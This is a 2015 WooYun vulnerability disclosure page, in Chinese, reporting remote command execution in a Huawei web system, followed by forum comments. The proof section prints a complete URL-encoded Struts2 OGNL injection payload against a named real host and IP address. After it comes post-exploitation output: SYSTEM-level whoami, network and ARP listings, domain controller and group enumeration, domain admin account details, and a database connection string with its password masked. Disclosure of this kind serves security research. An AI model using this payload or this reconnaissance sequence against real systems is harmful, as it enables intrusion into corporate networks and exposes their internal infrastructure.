当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149850

漏洞标题:华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)

相关厂商:华为技术有限公司

漏洞作者: 猪猪侠

提交时间:2015-10-27 15:42

修复时间:2015-12-12 00:34

公开时间:2015-12-12 00:34

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络 域环境)
在域环境内,SYSTEM权限,可内网渗透,影响大,考虑了半天,还是写中文的
利用域渗透技术
http://zone.wooyun.org/content/23396

详细说明:

#1 漏洞服务器
http://wdt-mx.huawei.com/sdtrp/project.action
http://119.145.15.78/sdtrp/project.action

漏洞证明:

#2 exp
http://wdt-mx.huawei.com

http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D


D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\
whoami

nt authority\system


ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE
   Primary Dns Suffix  . . . . . . . : china.huawei.com


arp -a
Interface: 10.88.178.105 --- 0xc
  Internet Address      Physical Address      Type
  10.88.178.1           00-00-5e-00-01-b2     dynamic   
  10.88.178.2           f8-4a-bf-5c-1d-0e     dynamic   
  10.88.178.3           f8-4a-bf-5c-1b-fe     dynamic   
  10.88.178.255         ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static    
Interface: 10.88.72.91 --- 0xe
  Internet Address      Physical Address      Type
  10.88.72.1            00-00-5e-00-01-48     dynamic   
  10.88.72.2            f8-4a-bf-5c-1d-0d     dynamic   
  10.88.72.3            f8-4a-bf-5c-1b-fd     dynamic   
  10.88.72.5            00-25-9e-b0-db-44     dynamic   
  10.88.72.255          ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  239.255.255.250       01-00-5e-7f-ff-fa     static


# 在域环境内,可内网渗透,影响非常大

net time /domain
Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34


Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data
Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:
Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:


域环境内:光域控制器都几百台,几十万人不是盖的
net group "Domain controllers" /domain

The request will be processed at a domain controller for domain china.huawei.com.
Group name     Domain Controllers
Comment        óò?D?ùóDóò?????÷
Members
-------------------------------------------------------------------------------


mask 区域


*****$              BLR*****
*****$              BRA*****
*****$              CGK*****
*****$              DFW*****
*****$              DGG*****
*****$              DGG*****
*****$              HGH*****
*****$              HKG*****
*****$              ISB*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LGG*****
*****$              LHR*****
*****$              LOS*****
*****$              MSC*****
*****$              NKG*****
*****$              NKG*****
*****$              NKG*****
*****$              NKG*****
*****$              PEK*****
*****$              RUH*****
*****$              SIA*****
*****$              SJC*****
*****$              SZX*****
*****$              SZX*****
*****$              SZX*****
*****D02-DC$        *****






           
YYZAD02-DC$              
The command completed successfully.


The request will be processed at a domain controller for domain china.huawei.com.
Group name     IT-ITPL-DC-CD-w
Comment        云数据中心安全解决方案部
Members
-------------------------------------------------------------------------------


mask 区域


*****               d00*****
*****               h00*****
*****               h00*****
*****               j00*****
*****               l00*****
*****               l00*****
*****               l00*****
*****               l00*****
*****               o00*****
*****               r90*****
*****               s00*****
*****               w00*****
*****               w00*****
*****               x00*****
*****               y00*****
*****               y90*****
*****               z00*****
*****               z00*****
*****0359515       *****






             
The command completed successfully.


# 终极BOSS

The request will be processed at a domain controller for domain china.huawei.com.
User name                    china-admin
Full Name                    
Comment                      管理计算机(域)的内置帐户
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never
Password last set            2015/10/17 16:04:55
Password expires             Never
Password changeable          2015/10/17 16:04:55
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never
Logon hours allowed          All
Local Group Memberships      *Administrators       *MomAdministrators    
                             *X86-ADMIN1           *X86-ADMIN2           
                             *X86-ADMIN3           
Global Group memberships     *MOMadmins            *Domain Admins        
                             *Domain Users         *Group Policy Creator 
The command completed successfully.


# 审计监控系统的数据库

var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";
var oADOConn,oADOCommand,oADORecord;
var strServer,strTask,strStatus,strADOCommand;
var oArgs;
var iAffected;


修复方案:

# 更新

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-28 00:32

厂商回复:

感谢猪猪侠提醒,已通知业务进行修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-27 15:53 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    股市又跌了

  2. 2015-10-27 15:53 | Chinalover ( 路人 | Rank:18 漏洞数:5 | 你看得到我打在屏幕上的字,却看不到我落在...)

    沙发

  3. 2015-10-27 15:54 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    华为某系统存在远程命令执行漏洞,考虑了半天,还是评论一下。

  4. 2015-10-27 16:15 | DNS ( 普通白帽子 | Rank:543 漏洞数:61 | 没有我,你们就去背IP吧)

    mark

  5. 2015-10-27 16:28 | 慢慢 ( 普通白帽子 | Rank:714 漏洞数:196 | 低调求发展)

    mark

  6. 2015-10-27 16:47 | prolog ( 普通白帽子 | Rank:580 漏洞数:111 | Rank:8888 漏洞数:1024 | 低调求发展)

    考虑了半天,决定不进股市了

  7. 2015-10-27 16:56 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    给力

  8. 2015-10-27 16:58 | Focusstart ( 普通白帽子 | Rank:651 漏洞数:174 | 努力让某某某成为最幸福的女人!)

    考虑了半天,内网渗透这个词用英文不好说

  9. 2015-10-27 17:01 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3650 漏洞数:282 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @Focusstart 内网漫游不会讲

  10. 2015-10-27 17:04 | DNS ( 普通白帽子 | Rank:543 漏洞数:61 | 没有我,你们就去背IP吧)

    @猪猪侠 百度说 Network roaming 0.0

  11. 2015-10-27 17:15 | Submit ( 普通白帽子 | Rank:491 漏洞数:109 | 卖WB,1:10)

    嗖嘎

  12. 2015-10-27 17:29 | 雷少 ( 实习白帽子 | Rank:73 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    股市又跌了 天桥上见

  13. 2015-10-27 17:37 | 随风的风 ( 普通白帽子 | Rank:176 漏洞数:57 | 微信公众号:233sec 不定期分享各种漏洞思...)

    考虑了半天,还是用中文提交好。英文百度翻译太不准了

  14. 2015-10-27 18:09 | Azazel ( 实习白帽子 | Rank:38 漏洞数:8 | 别威胁哥,哥不是好惹的)

    怎嚒不用英文(╯°□°)╯︵ ┻━┻

  15. 2015-10-27 19:39 | ksss ( 普通白帽子 | Rank:448 漏洞数:79 | 近乖者乖,近坏者坏)

    考虑了半天,还是写中文好

  16. 2015-10-27 20:23 | scanf ( 核心白帽子 | Rank:1334 漏洞数:193 | 。)

    因为股市

  17. 2015-10-27 20:50 | ganggang ( 路人 | Rank:4 漏洞数:2 | 这个号是来乌云聊天的....)

    The stock market fell again.

  18. 2015-10-27 22:05 | 霝z ( 普通白帽子 | Rank:101 漏洞数:41 | 不值得生气~就这样。see you soon.)

    好厉害!~膜拜!~

  19. 2015-10-28 00:44 | 苏州同程旅游网络科技有限公司(乌云厂商)

    one system within Huawei corp domain environment exists remote command execution vulnerability which could be used to bypass gateway firewall and intranet penetration testing.

  20. 2015-10-28 08:56 | Ton7BrEak ( 普通白帽子 | Rank:229 漏洞数:47 | 吃苦耐劳,我只会第一个!)

    @苏州同程旅游网络科技有限公司 抓住一只卖萌厂商~

  21. 2015-10-28 09:50 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:52 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    @苏州同程旅游网络科技有限公司 咦,真的是被抓住的卖萌厂商耶,送大家去旅游,就不抓你了

  22. 2015-10-28 11:38 | 一只猿 ( 普通白帽子 | Rank:509 漏洞数:92 | 硬件与无线通信研究方向)

    @苏州同程旅游网络科技有限公司 这个逼我必须给满分

  23. 2015-10-28 11:42 | DNS ( 普通白帽子 | Rank:543 漏洞数:61 | 没有我,你们就去背IP吧)

    @苏州同程旅游网络科技有限公司 我有几个妹子在你们公司 啊

  24. 2015-10-28 12:41 | 咚咚呛 ( 普通白帽子 | Rank:116 漏洞数:10 | 我是一只小毛驴咿呀咿呀呦~~)

    自从关注猪猪侠后,提醒犹如刷屏一般,每天都在一个人挖洞?

  25. 2015-10-28 18:57 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  26. 2015-10-29 11:33 | SLAckEr ( 实习白帽子 | Rank:62 漏洞数:23 | 呵呵浮躁的人们)

    st2....